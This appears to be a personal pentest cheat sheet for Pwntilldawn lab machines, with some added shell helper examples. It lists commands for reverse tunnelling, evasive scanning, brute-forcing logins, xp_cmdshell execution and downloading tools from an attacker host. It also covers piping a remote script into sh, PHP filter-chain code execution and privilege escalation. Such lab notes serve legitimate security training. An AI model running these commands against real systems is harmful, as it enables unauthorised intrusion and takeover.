
by Anthony Guilbert, 3 days ago


Pwntilldawn Mindmap FULL

The information provides a detailed overview of various techniques and tools used in cybersecurity, focusing on network scanning, steganography, pivoting and tunneling, privilege escalation, and web filtering.

Pwntilldawn FULL

Mindmap I did while doing some Pwntilldawn boxes

Pivoting / Tunneling

Tunneling & Port Forwarding
If we have SSH access

sshuttle -r user@ip -N

(-N auto-detects the remote subnets to route through the SSH host; give the target CIDR instead of -N to be explicit)

Web service listening on localhost only

On the victim

./chisel client ip_host:7777 R:8080:127.0.0.1:8080

Don't forget to adapt port 8080 to the situation (port 8080 on the attacker host then reaches the victim's 127.0.0.1:8080)

On the attacker host (start it before the client)

chisel server --port 7777 --reverse

Check what is listening on localhost first (netstat -antup on the victim, see Misc)
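Added example, not part of the original mindmap: a small shell helper that reads the victim's ss -tln output and builds the chisel client command that reverse-forwards every TCP listener bound only to loopback, so each localhost-only service appears on the attacker host at the same port. The ss output, the attacker address 10.10.14.5:7777 and the function names are constructed assumptions.

```shell
#!/bin/sh
# Added example (not from the original mindmap): from `ss -tln` output captured
# on the victim, emit one chisel "R:" remote per loopback-only TCP listener and
# print the full client command line. The sample below is constructed.

SAMPLE_SS='State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       128     127.0.0.1:8080       0.0.0.0:*
LISTEN  0       80      127.0.0.1:3306       0.0.0.0:*
LISTEN  0       128     [::1]:5432           [::]:*
LISTEN  0       128     *:80                 *:*'

# Read ss -tln text on stdin; print "R:PORT:localhost:PORT" for every listener
# whose local address is 127.0.0.1 or [::1]. "localhost" is the destination
# because the chisel client resolves it on the victim, where it covers both
# loopback families; services already on 0.0.0.0 or * need no forward.
loopback_forwards() {
    awk 'NR > 1 && $1 == "LISTEN" {
        addr = $4; sub(/:[0-9]+$/, "", addr)      # "[::1]:5432" -> "[::1]"
        port = $4; sub(/^.*:/, "", port)          # "[::1]:5432" -> "5432"
        if (addr == "127.0.0.1" || addr == "[::1]")
            printf "R:%s:localhost:%s\n", port, port
    }'
}

# Usage: chisel_client_cmd ATTACKER_IP:PORT < ss_output
# Prints the chisel client command with all R: remotes on one line.
chisel_client_cmd() {
    forwards=$(loopback_forwards | tr '\n' ' ')
    printf './chisel client %s %s\n' "$1" "${forwards% }"
}

printf '%s\n' "$SAMPLE_SS" | chisel_client_cmd 10.10.14.5:7777
# Attacker side, started first: chisel server --port 7777 --reverse
```

Paste the printed line on the victim; ports bound on the attacker host by the reverse remotes are the same numbers as on the victim, so adjust the first number of an R: entry if it collides with something local.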

NMAP

Nmap Automator
nmap -sV -sC -T5 -p- ip
IDS/Firewalls (source port 53 slips past filters that let "DNS" traffic through; -D RND:3 adds three random decoy sources; binding port 53 and -sS both need root)
ncat -nv --source-port 53 10.129.2.28 50000
nmap -sS -Pn -n -p- --disable-arp-ping -D RND:3 --source-port 53 ip
nmap -sSU --script dns-nsid ip

Protocoles divers

DNS
! AXFR ! (zone transfer: try it against every name server found, it dumps all records)

dig @mortysserver.com mortysserver.com axfr

Add the discovered names to /etc/hosts if needed

Example: 10.150.150.57 rickscontrolpanel.mortysserver.com
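Added example, not part of the original mindmap: a helper that turns the A records of a dig axfr dump into /etc/hosts lines, grouping every name that resolves to the same IP on one line. The dig output below is constructed to look like the transfer above; the dev.mortysserver.com and ns1.mortysserver.com names, the 10.150.150.58 address and the function name are illustrative assumptions.

```shell
#!/bin/sh
# Added example (not from the original mindmap): convert `dig ... axfr` output
# into /etc/hosts lines. The zone dump below is constructed for illustration.

SAMPLE_AXFR='; <<>> DiG 9.18.24 <<>> @mortysserver.com mortysserver.com axfr
;; global options: +cmd
mortysserver.com.        3600  IN  SOA   ns1.mortysserver.com. admin.mortysserver.com. 2024010101 3600 900 604800 86400
mortysserver.com.        3600  IN  NS    ns1.mortysserver.com.
ns1.mortysserver.com.    3600  IN  A     10.150.150.57
rickscontrolpanel.mortysserver.com. 3600 IN A 10.150.150.57
dev.mortysserver.com.    3600  IN  A     10.150.150.58
mortysserver.com.        3600  IN  SOA   ns1.mortysserver.com. admin.mortysserver.com. 2024010101 3600 900 604800 86400
;; Query time: 3 msec'

# Read dig axfr text on stdin; print "IP name [name ...]" per IP, in first-seen
# order. Only A records are used (NS/SOA/CNAME/TXT lines are skipped), the
# trailing dot is removed and duplicate name/IP pairs are dropped.
axfr_to_hosts() {
    awk '$1 !~ /^;/ && $4 == "A" {
        name = $1; sub(/\.$/, "", name)
        if (!(($5, name) in seen)) {
            seen[$5, name] = 1
            if (!($5 in names)) { order[++n] = $5; names[$5] = name }
            else { names[$5] = names[$5] " " name }
        }
    }
    END { for (i = 1; i <= n; i++) printf "%s %s\n", order[i], names[order[i]] }'
}

printf '%s\n' "$SAMPLE_AXFR" | axfr_to_hosts
# Real use: dig @ns target.tld axfr | axfr_to_hosts | sudo tee -a /etc/hosts
```

Virtual hosts only answer to their name, so every hostname from the transfer goes on the hosts line, not just the first one found.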

SSH
Try connecting just to read the banner (version)
Connect if we have a private key (chmod 600 id_rsa first, ssh refuses a world-readable key)

ssh -i id_rsa user@ip

POP3
hydra -l operator -P wordlist.txt ip pop3
MSSQL
EXEC xp_cmdshell 'powershell -encodedcommand ';

Set up a listener first. xp_cmdshell is disabled by default: if the call fails, enable it with sp_configure ('show advanced options' then 'xp_cmdshell', RECONFIGURE after each), which needs sysadmin.

mssqlclient.py 'sequel.htb/sa:MSSQLP@ssw0rd!@10.10.11.51' (single-quote it: the ! otherwise triggers bash history expansion)
Mysql
mysql -h localhost -u sql_user -p
mysqldump -u root -p --all-databases > alldb.sql
FTP
Check for anonymous login (user anonymous, any password)
NFS
showmount -e IP
sudo mount -t nfs ip:/remote /local
sudo umount 10.150.150.59:/nfsroot
rpcinfo IP
SMTP
hydra -l operator -P wordlist.txt ip smtp
smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt 10.150.150.17 25
(positional host and port is the syntax of the Python smtp-user-enum; the classic Perl version takes -t host -p port and -M VRFY/EXPN/RCPT)

Misc

netstat -antup (listening ports and established connections with owning PIDs)
Dumb shell upgrade (get a real TTY)
python3 -c 'import pty; pty.spawn("/bin/bash")'
script /dev/null -qc /bin/bash
Then Ctrl-Z, run stty raw -echo; fg on the attacker side and export TERM=xterm in the shell to get Ctrl-C, tab completion and working editors.

Transfer files - windows

target (windows)
Invoke-WebRequest -Uri http://10.10.16.35:7676/SharpGPOAbuse.exe -OutFile SharpGPOAbuse.exe
host (linux)
python3 -m http.server port (same port as in the URL, 7676 above; serves the current directory)

Find files

Windows

Recycle Bin (hidden deleted files): list its contents

(New-Object -ComObject Shell.Application).Namespace(0xA).Items() | ForEach-Object { "$($_.Name) - $($_.Path)" }

Then copy the file out (the $R... entry is the file content, the matching $I... entry holds its original name and path)

Copy-Item 'C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z' -Destination 'C:\Users\f.frizzle\Desktop\wapt-backup-sunday.7z'

Find file

tree /a /f
@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"
Linux
Other

grep -r pattern . (recursive search in file contents; add -l to list only file names)

Find

find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null

find . | grep FLAG3

find / \( -name ".env" -o -name ".git" \) 2>/dev/null

find / -type f -name 'FLAG[0-9].txt' 2>/dev/null

Privesc

Python Library Hijacking
A script run as root (cron, sudo) imports libraries: if the module file, or a directory that comes earlier on the import search path (the script's own directory is searched first), is writable, drop a module of the same name there and it runs as root
Metasploit
Upgrade session: sessions -u id
Linux
LXC/LXD

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

SUID

find / -perm -u=s -type f 2>/dev/null

Symbolic link (typical use: a root job archives or copies a directory we control; a link inside it pointing at /root makes the job read /root for us)

ln -s /root /home/michael/importantfiles/rootbackup

searchsploit

searchsploit -m path (mirror the exploit into the current directory)

searchsploit xxxx

linpeas

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

Windows
winpeas
msfconsole

post/multi/recon/local_exploit_suggester
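Added example, not part of the original mindmap: the SUID find above returns dozens of stock binaries; this helper runs the same find and drops the ones on a baseline list, so only the unusual entries (the ones to look up on GTFOBins) remain. It matches on the full path relative to the scanned root, so a copy of a stock binary placed elsewhere still shows up. The BASELINE list is a short illustrative subset of a Debian-style install, not a complete one, and the function name is an assumption.

```shell
#!/bin/sh
# Added example (not from the original mindmap): list SUID files and hide the
# ones that are expected on a stock system. BASELINE is an illustrative subset.

BASELINE='/usr/bin/passwd /usr/bin/su /usr/bin/sudo /usr/bin/mount /usr/bin/umount
/usr/bin/ping /usr/bin/chsh /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/pkexec
/bin/su /bin/mount /bin/umount /bin/ping'

# Usage: unusual_suid [root_dir]
# Prints every SUID regular file under root_dir whose path (relative to root_dir)
# is not in BASELINE. Matching on the path rather than the name means
# /tmp/passwd with the SUID bit is still reported.
unusual_suid() {
    root="${1:-/}"
    root="${root%/}"                    # "/" -> "", "/mnt/x/" -> "/mnt/x"
    find "${root:-/}" -type f -perm -u=s 2>/dev/null | while IFS= read -r path; do
        rel="${path#"$root"}"           # path as it would appear on a live system
        case " $(printf '%s' "$BASELINE" | tr '\n' ' ') " in
            *" $rel "*) ;;              # stock SUID binary, skip
            *) printf '%s\n' "$path" ;; # unexpected: check it on GTFOBins
        esac
    done
}

unusual_suid "${1:-/}"
```

Point it at a mounted image or an NFS export as well (unusual_suid /mnt/nfsroot) to audit a filesystem without running anything on the target.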

WEB

Wordpress
Bruteforce

wpscan --url url_wordpress --passwords wordlist (without --usernames it first enumerates users, then attacks them)

User enumeration

wpscan --url url --enumerate u

wpscan --url https://www.hackinprovence.fr/ -e u
Check for vulnerable themes and plugins

wpscan --url url --enumerate vp,vt (vulnerability data needs an --api-token from wpscan.com; without it you only get the plugin/theme list)

PHP Filters
python3 script.py --chain ''

--chain takes the PHP code to execute; the output is a php://filter/convert.iconv... string to use as the included file name wherever a file inclusion exists (the script is php_filter_chain_generator.py from the repo below).

https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py

Enumeration
Path

Dirsearch

FeroxBuster

feroxbuster -u url -w ~/Desktop/SecLists-master/Discovery/Web-Content/common.txt --filter-status 404

feroxbuster -u http://example.com -w wordlist -x php,html,txt -v -o output.txt --filter-status 404

-k for self-signed certificates

Bruteforce Forms
Hydra

hydra -l admin -P SecLists-master/rockyou.txt 10.150.150.38 -s 30609 -t 20 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"

(Jenkins login form. The module argument is path:POST body with ^USER^ and ^PASS^ substituted:string that marks a failed login; -s is the port, -t the number of parallel tasks.)

hydra -l operator -P wordlist.txt 10.150.150.56 (the service name is missing from this line; hydra needs it after the target)

Stegano

searchsploit
searchsploit -m xxxxx
Depixelise
Unredactor
Depix

python3 depix.py -p pixel_image -s images/searchimages/image.png

(-p is the pixelated crop, -s a search image from Depix's images/searchimages matching the font and editor of the original; add -o output.png to save the result)

Stereogram
https://piellardj.github.io/stereogram-solver/
Aperisolve (online: runs zsteg, steghide, outguess, exiftool, binwalk, foremost and strings on an uploaded image)
Steghide
steghide extract -sf screen.jpeg (prompts for the passphrase; try an empty one first)